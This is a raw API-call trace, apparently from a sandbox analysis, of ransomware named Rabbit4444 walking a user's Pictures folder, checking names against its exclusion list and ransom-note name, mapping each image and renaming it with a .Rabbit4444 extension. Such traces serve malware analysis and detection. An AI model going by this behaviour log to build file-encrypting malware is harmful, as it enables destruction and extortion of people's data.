QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13996455004) returned 1 [0048.654] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=79563) returned 1 [0048.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0048.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101a68 [0048.654] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x139d0, lpName=0x0) returned 0x298 [0048.674] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x139d0) returned 0x70000 [0048.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0048.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0048.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.676] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13998669727) returned 1 [0048.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0048.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101a68 | out: hHeap=0xe0000) returned 1 [0048.676] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.677] CloseHandle (hObject=0x298) returned 1 [0048.677] CloseHandle (hObject=0x278) returned 1 [0048.680] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\7ZNXracFupquDdAVyh.png.Rabbit4444") returned 58 [0048.680] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\7ZNXracFupquDdAVyh.png" (normalized: "c:\\users\\fd1hvy\\pictures\\7znxracfupquddavyh.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\7ZNXracFupquDdAVyh.png.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\7znxracfupquddavyh.png.rabbit4444"), dwFlags=0x1) returned 1 [0048.680] InterlockedExchangeAdd (in: Addend=0xff618, Value=79568 | out: Addend=0xff618) returned 17595856 [0048.680] InterlockedExchangeAdd (in: Addend=0xff624, Value=22 | out: Addend=0xff624) returned 3382 [0048.680] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54412aa0, ftCreationTime.dwHighDateTime=0x1d4d594, ftLastAccessTime.dwLowDateTime=0x3a20fb30, ftLastAccessTime.dwHighDateTime=0x1d4d44c, ftLastWriteTime.dwLowDateTime=0x3a20fb30, ftLastWriteTime.dwHighDateTime=0x1d4d44c, nFileSizeHigh=0x0, nFileSizeLow=0x215b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AMY25182fq.jpg", cAlternateFileName="AMY251~1.JPG")) returned 1 [0048.680] lstrcmpiW (lpString1="AMY25182fq.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.680] lstrcmpiW (lpString1="AMY25182fq.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.680] lstrcmpiW (lpString1="AMY25182fq.jpg", lpString2="Rabbit4444.exe") returned -1 [0048.680] lstrcmpiW (lpString1="AMY25182fq.jpg", lpString2=".") returned 1 [0048.680] lstrcmpiW (lpString1="AMY25182fq.jpg", lpString2="..") returned 1 [0048.680] lstrcmpiW (lpString1="AMY25182fq.jpg", lpString2="windows") returned -1 [0048.680] lstrcmpiW (lpString1="AMY25182fq.jpg", lpString2="bootmgr") returned -1 [0048.680] lstrcmpiW (lpString1="AMY25182fq.jpg", lpString2="pagefile.sys") returned -1 [0048.680] lstrcmpiW (lpString1="AMY25182fq.jpg", lpString2="boot") returned -1 [0048.680] lstrcmpiW (lpString1="AMY25182fq.jpg", lpString2="ids.txt") returned -1 [0048.680] lstrcmpiW (lpString1="AMY25182fq.jpg", lpString2="NTUSER.DAT") returned -1 [0048.681] lstrcpyW (in: lpString1=0x130eb6a, lpString2="AMY25182fq.jpg" | out: lpString1="AMY25182fq.jpg") returned="AMY25182fq.jpg" [0048.681] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\AMY25182fq.jpg", dwFileAttributes=0x0) returned 1 [0048.681] lstrlenW (lpString="AMY25182fq.jpg") returned 14 [0048.681] lstrlenW (lpString="Rabbit4444") returned 10 [0048.681] lstrcmpiW (lpString1="5182fq.jpg", lpString2="Rabbit4444") returned -1 [0048.681] lstrlenW (lpString=".dll") returned 4 [0048.681] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.681] lstrlenW (lpString=".lnk") returned 4 [0048.681] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.681] lstrlenW (lpString=".ini") returned 4 [0048.681] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.681] lstrlenW (lpString=".sys") returned 4 [0048.681] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.681] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\AMY25182fq.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\amy25182fq.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.681] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.681] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13999191177) returned 1 [0048.681] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8539) returned 1 [0048.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0048.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0048.681] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2460, lpName=0x0) returned 0x298 [0048.681] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2460) returned 0x70000 [0048.682] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.682] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.682] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.682] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.682] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13999321887) returned 1 [0048.683] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0048.683] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0048.683] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.683] CloseHandle (hObject=0x298) returned 1 [0048.683] CloseHandle (hObject=0x278) returned 1 [0048.684] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\AMY25182fq.jpg.Rabbit4444") returned 50 [0048.684] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\AMY25182fq.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\amy25182fq.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\AMY25182fq.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\amy25182fq.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0048.688] InterlockedExchangeAdd (in: Addend=0xff618, Value=8544 | out: Addend=0xff618) returned 17675424 [0048.688] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3404 [0048.688] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x848d3620, ftCreationTime.dwHighDateTime=0x1d4ce66, ftLastAccessTime.dwLowDateTime=0xcdff7a50, ftLastAccessTime.dwHighDateTime=0x1d4cae9, ftLastWriteTime.dwLowDateTime=0xcdff7a50, ftLastWriteTime.dwHighDateTime=0x1d4cae9, nFileSizeHigh=0x0, nFileSizeLow=0x11973, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aq_JMuY.gif", cAlternateFileName="")) returned 1 [0048.688] lstrcmpiW (lpString1="Aq_JMuY.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.688] lstrcmpiW (lpString1="Aq_JMuY.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.688] lstrcmpiW (lpString1="Aq_JMuY.gif", lpString2="Rabbit4444.exe") returned -1 [0048.688] lstrcmpiW (lpString1="Aq_JMuY.gif", lpString2=".") returned 1 [0048.688] lstrcmpiW (lpString1="Aq_JMuY.gif", lpString2="..") returned 1 [0048.688] lstrcmpiW (lpString1="Aq_JMuY.gif", lpString2="windows") returned -1 [0048.688] lstrcmpiW (lpString1="Aq_JMuY.gif", lpString2="bootmgr") returned -1 [0048.688] lstrcmpiW (lpString1="Aq_JMuY.gif", lpString2="pagefile.sys") returned -1 [0048.688] lstrcmpiW (lpString1="Aq_JMuY.gif", lpString2="boot") returned -1 [0048.688] lstrcmpiW (lpString1="Aq_JMuY.gif", lpString2="ids.txt") returned -1 [0048.688] lstrcmpiW (lpString1="Aq_JMuY.gif", lpString2="NTUSER.DAT") returned -1 [0048.688] lstrcpyW (in: lpString1=0x130eb6a, lpString2="Aq_JMuY.gif" | out: lpString1="Aq_JMuY.gif") returned="Aq_JMuY.gif" [0048.688] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Aq_JMuY.gif", dwFileAttributes=0x0) returned 1 [0048.688] lstrlenW (lpString="Aq_JMuY.gif") returned 11 [0048.688] lstrlenW (lpString="Rabbit4444") returned 10 [0048.688] lstrcmpiW (lpString1="q_JMuY.gif", lpString2="Rabbit4444") returned -1 [0048.688] lstrlenW (lpString=".dll") returned 4 [0048.689] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0048.689] lstrlenW (lpString=".lnk") returned 4 [0048.689] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0048.689] lstrlenW (lpString=".ini") returned 4 [0048.689] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0048.689] lstrlenW (lpString=".sys") returned 4 [0048.689] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0048.689] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Aq_JMuY.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\aq_jmuy.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.689] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.689] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13999959666) returned 1 [0048.689] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=72051) returned 1 [0048.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0048.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0048.689] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11c80, lpName=0x0) returned 0x298 [0048.689] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11c80) returned 0x70000 [0048.691] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.691] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0048.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.691] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.691] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0048.691] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14000206038) returned 1 [0048.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0048.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0048.691] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.692] CloseHandle (hObject=0x298) returned 1 [0048.692] CloseHandle (hObject=0x278) returned 1 [0048.695] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\Aq_JMuY.gif.Rabbit4444") returned 47 [0048.695] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\Aq_JMuY.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\aq_jmuy.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\Aq_JMuY.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\aq_jmuy.gif.rabbit4444"), dwFlags=0x1) returned 1 [0048.696] InterlockedExchangeAdd (in: Addend=0xff618, Value=72064 | out: Addend=0xff618) returned 17683968 [0048.696] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3405 [0048.696] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0048.696] lstrcmpiW (lpString1="Camera Roll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.696] lstrcmpiW (lpString1="Camera Roll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.696] lstrcmpiW (lpString1="Camera Roll", lpString2="Rabbit4444.exe") returned -1 [0048.696] lstrcmpiW (lpString1="Camera Roll", lpString2=".") returned 1 [0048.696] lstrcmpiW (lpString1="Camera Roll", lpString2="..") returned 1 [0048.696] lstrcmpiW (lpString1="Camera Roll", lpString2="windows") returned -1 [0048.696] lstrcmpiW (lpString1="Camera Roll", lpString2="bootmgr") returned 1 [0048.696] lstrcmpiW (lpString1="Camera Roll", lpString2="pagefile.sys") returned -1 [0048.696] lstrcmpiW (lpString1="Camera Roll", lpString2="boot") returned 1 [0048.696] lstrcmpiW (lpString1="Camera Roll", lpString2="ids.txt") returned -1 [0048.696] lstrcmpiW (lpString1="Camera Roll", lpString2="NTUSER.DAT") returned -1 [0048.696] lstrcpyW (in: lpString1=0x130eb6a, lpString2="Camera Roll" | out: lpString1="Camera Roll") returned="Camera Roll" [0048.696] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", dwFileAttributes=0x10) returned 1 [0048.696] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0048.696] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4a) returned 0x10cd98 [0048.696] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6390 [0048.696] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16200460, ftCreationTime.dwHighDateTime=0x1d4d456, ftLastAccessTime.dwLowDateTime=0x3375a770, ftLastAccessTime.dwHighDateTime=0x1d4d28c, ftLastWriteTime.dwLowDateTime=0x3375a770, ftLastWriteTime.dwHighDateTime=0x1d4d28c, nFileSizeHigh=0x0, nFileSizeLow=0x637e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ce1PVVjhKneKv.jpg", cAlternateFileName="CE1PVV~1.JPG")) returned 1 [0048.696] lstrcmpiW (lpString1="Ce1PVVjhKneKv.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.697] lstrcmpiW (lpString1="Ce1PVVjhKneKv.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.697] lstrcmpiW (lpString1="Ce1PVVjhKneKv.jpg", lpString2="Rabbit4444.exe") returned -1 [0048.697] lstrcmpiW (lpString1="Ce1PVVjhKneKv.jpg", lpString2=".") returned 1 [0048.697] lstrcmpiW (lpString1="Ce1PVVjhKneKv.jpg", lpString2="..") returned 1 [0048.697] lstrcmpiW (lpString1="Ce1PVVjhKneKv.jpg", lpString2="windows") returned -1 [0048.697] lstrcmpiW (lpString1="Ce1PVVjhKneKv.jpg", lpString2="bootmgr") returned 1 [0048.697] lstrcmpiW (lpString1="Ce1PVVjhKneKv.jpg", lpString2="pagefile.sys") returned -1 [0048.697] lstrcmpiW (lpString1="Ce1PVVjhKneKv.jpg", lpString2="boot") returned 1 [0048.697] lstrcmpiW (lpString1="Ce1PVVjhKneKv.jpg", lpString2="ids.txt") returned -1 [0048.697] lstrcmpiW (lpString1="Ce1PVVjhKneKv.jpg", lpString2="NTUSER.DAT") returned -1 [0048.697] lstrcpyW (in: lpString1=0x130eb6a, lpString2="Ce1PVVjhKneKv.jpg" | out: lpString1="Ce1PVVjhKneKv.jpg") returned="Ce1PVVjhKneKv.jpg" [0048.697] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Ce1PVVjhKneKv.jpg", dwFileAttributes=0x0) returned 1 [0048.697] lstrlenW (lpString="Ce1PVVjhKneKv.jpg") returned 17 [0048.697] lstrlenW (lpString="Rabbit4444") returned 10 [0048.697] lstrcmpiW (lpString1="hKneKv.jpg", lpString2="Rabbit4444") returned -1 [0048.697] lstrlenW (lpString=".dll") returned 4 [0048.697] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.697] lstrlenW (lpString=".lnk") returned 4 [0048.697] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.697] lstrlenW (lpString=".ini") returned 4 [0048.697] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.697] lstrlenW (lpString=".sys") returned 4 [0048.697] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.697] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Ce1PVVjhKneKv.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ce1pvvjhknekv.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.697] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.697] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14000821704) returned 1 [0048.698] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=25470) returned 1 [0048.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0048.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0048.698] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6680, lpName=0x0) returned 0x298 [0048.698] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6680) returned 0x70000 [0048.699] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.699] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0048.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.699] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0048.699] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0048.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0048.699] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14000977713) returned 1 [0048.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0048.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0048.699] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.699] CloseHandle (hObject=0x298) returned 1 [0048.699] CloseHandle (hObject=0x278) returned 1 [0048.703] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\Ce1PVVjhKneKv.jpg.Rabbit4444") returned 53 [0048.703] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\Ce1PVVjhKneKv.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ce1pvvjhknekv.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\Ce1PVVjhKneKv.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\ce1pvvjhknekv.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0048.703] InterlockedExchangeAdd (in: Addend=0xff618, Value=25472 | out: Addend=0xff618) returned 17756032 [0048.703] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3407 [0048.703] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe04a60, ftCreationTime.dwHighDateTime=0x1d4c8b2, ftLastAccessTime.dwLowDateTime=0x865e2000, ftLastAccessTime.dwHighDateTime=0x1d4d09f, ftLastWriteTime.dwLowDateTime=0x865e2000, ftLastWriteTime.dwHighDateTime=0x1d4d09f, nFileSizeHigh=0x0, nFileSizeLow=0x1177b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D tDC8K.jpg", cAlternateFileName="DTDC8K~1.JPG")) returned 1 [0048.703] lstrcmpiW (lpString1="D tDC8K.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.703] lstrcmpiW (lpString1="D tDC8K.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.703] lstrcmpiW (lpString1="D tDC8K.jpg", lpString2="Rabbit4444.exe") returned -1 [0048.703] lstrcmpiW (lpString1="D tDC8K.jpg", lpString2=".") returned 1 [0048.703] lstrcmpiW (lpString1="D tDC8K.jpg", lpString2="..") returned 1 [0048.703] lstrcmpiW (lpString1="D tDC8K.jpg", lpString2="windows") returned -1 [0048.703] lstrcmpiW (lpString1="D tDC8K.jpg", lpString2="bootmgr") returned 1 [0048.704] lstrcmpiW (lpString1="D tDC8K.jpg", lpString2="pagefile.sys") returned -1 [0048.704] lstrcmpiW (lpString1="D tDC8K.jpg", lpString2="boot") returned 1 [0048.704] lstrcmpiW (lpString1="D tDC8K.jpg", lpString2="ids.txt") returned -1 [0048.704] lstrcmpiW (lpString1="D tDC8K.jpg", lpString2="NTUSER.DAT") returned -1 [0048.704] lstrcpyW (in: lpString1=0x130eb6a, lpString2="D tDC8K.jpg" | out: lpString1="D tDC8K.jpg") returned="D tDC8K.jpg" [0048.704] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\D tDC8K.jpg", dwFileAttributes=0x0) returned 1 [0048.704] lstrlenW (lpString="D tDC8K.jpg") returned 11 [0048.704] lstrlenW (lpString="Rabbit4444") returned 10 [0048.704] lstrcmpiW (lpString1=" tDC8K.jpg", lpString2="Rabbit4444") returned -1 [0048.704] lstrlenW (lpString=".dll") returned 4 [0048.704] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.704] lstrlenW (lpString=".lnk") returned 4 [0048.704] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.704] lstrlenW (lpString=".ini") returned 4 [0048.704] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.704] lstrlenW (lpString=".sys") returned 4 [0048.704] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.704] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\D tDC8K.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\d tdc8k.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.704] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.704] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14001503074) returned 1 [0048.704] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=71547) returned 1 [0048.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0048.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0048.704] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11a80, lpName=0x0) returned 0x298 [0048.705] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11a80) returned 0x70000 [0048.706] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.706] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0048.706] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 